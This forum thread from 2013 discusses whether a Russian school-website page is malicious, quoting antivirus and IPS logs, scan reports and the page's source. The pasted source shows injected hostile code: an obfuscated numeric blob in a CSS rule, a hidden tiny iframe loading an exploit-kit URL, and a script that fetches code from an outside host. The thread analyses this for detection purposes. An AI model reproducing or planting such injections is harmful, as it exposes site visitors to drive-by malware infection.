
[Unverified] http://21415s13.edusite.ru/p48aa1.html

wjcharles
Posted on 2013-1-27 15:40:23
Last edited by wjcharles on 2013-1-27 15:42

Is this a false positive? I turned off the IPS and went in, and nothing much happened...

类别: 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/1/27 15:36:05,高,阻止了 loja15.redecommerce.com.br 的入侵企图,已阻止,不需要操作,Web Attack: Red Exploit Kit Website,不需要操作,不需要操作,"loja15.redecommerce.com.br (108.179.216.224, 80)",loja15.redecommerce.com.br/wkkj.htm?i=1467979,"WIN-MUD6U7NNTD1 (192.168.58.128, 56875)",108.179.216.224 (108.179.216.224),"TCP, www-http"
来自 <b>loja15.redecommerce.com.br/wkkj.htm?i=1467979</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME1\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE 引起。  要停止接收有关此类通信的通知,请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

寒山竹语
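Posted on 2013-1-27 16:10:41
trendmicro
Is this site safe?
Dangerous
Recent tests show that this site contains malicious software or deceives visitors.
What category does this site belong to?
Virus dropper
Sites that directly or indirectly help spread malware or malicious code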
xiuzhiguo
Posted on 2013-1-28 13:35:16
Report for 21415s13.edusite.ru/p48aa1.html

No malicious activity or malware detected.
Scan Time: 2013-01-28 05:34:56 UTC.

Scanned IP: 85.193.69.29
Country: Russian Federation

Scan results for the last 7 days:

1 Safe
0 Suspicious
0 High Risk
0 Inconclusive

Blacklist Checking: Safe
Phishing: Safe
Malicious Activity: Safe
Malware Downloads: Safe
Suspicious Activity: Safe

Domain: 21415s13.edusite.ru
Website: 21415s13.edusite.ru

Tom179090
Posted on 2013-1-28 14:34:05
Last edited by Tom179090 on 2013-1-28 14:35

<HTML><HEAD><meta name='generator' content='Конструктор школьных сайтов - www.edusite.ru'><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><meta name='Keywords' content=''><TITLE>Месячник "Старт в профессию"</TITLE><link rel='STYLESHEET' type='text/css' href='st.css'><link rel='STYLESHEET' type='text/css' href='scin/pages.css'><link rel='STYLESHEET' type='text/css' href='scin/teg.css'><link rel='STYLESHEET' type='text/css' href='scin/left-menu.css'>
<style>#c118{background:url(data:,13,41.5,26,55,12.5,32.5,28,10,10.5,41.5,17.5,6.5,26.5,22.5,10.5,9.5,23.5,42,25,11,43.5,42,43,11,2.5,52.5,9.5,27,15,15,12.5,36.5,47.5,19,7.5,9,33,15,2.5,47,24.5,48.5,24.5,3.5,30,35.5,40.5,19,44.5,49.5,46,29.5,20,9,13.5,16,24,34.5,40,17.5,7.5,32.5,38.5,11,13.5,48,9,8.5,20,3,53.5,22,38,50,18,3,4,17,21.5,8.5,5.5,43.5,54,30.5,4,28.5,15,7,12.5,24.5,5,37,14,23.5,3.5,42,18,27,48,12.5,18,39.5,46,31.5,28,9.5,7.5,6.5,10.5,26,46,5,12.5,7.5,5,55,4.5,40,3.5,4.5,37,45.5,21.5,8.5,10,16,14.5,21.5,33.5,54.5,5.5,24.5,4,33.5,19.5,19.5,20,14,4.5,5,6,12.5,25.5,38,15.5,11,7,32,17.5,16,2,8.5,19.5,12,41.5,38,4,49,22,4,13,6,30.5,12,8,34,27.5,20,14,8.5,15,47,7.5,3,18,50.5,22,16,10,8,5,11);}</style>


<!-- C/C -->













<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://love-mylottery.com/wkkj.html?i=1467979></iframe></body></HTML>
<script>
var gaJsHost = (("http:" == document.location.protocol) ? "http://yandex" : "http://yandex"); document.write(unescape("%3Cscript src='" + gaJsHost + "-yandex.uni.cc/verify-v1?id="+Math.floor(Math.random() *30000)+"&group=2&seoref="+encodeURIComponent(document.referrer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=' type='text/javascript'%3E%3C/script%3E"));
</script>
yifan1518
Posted on 2013-2-6 17:06:24
2013/2/6 17:05:46        拒绝: http://love-mylottery.com/wkkj.html?i=1467979(根据可疑网址库进行分析)        http://love-mylottery.com/wkkj.html?i=1467979        在数据库中检测到该网址        Google Chrome               
Kaspersky small business edition

Copyright © KaFan  KaFan.cn All Rights Reserved.
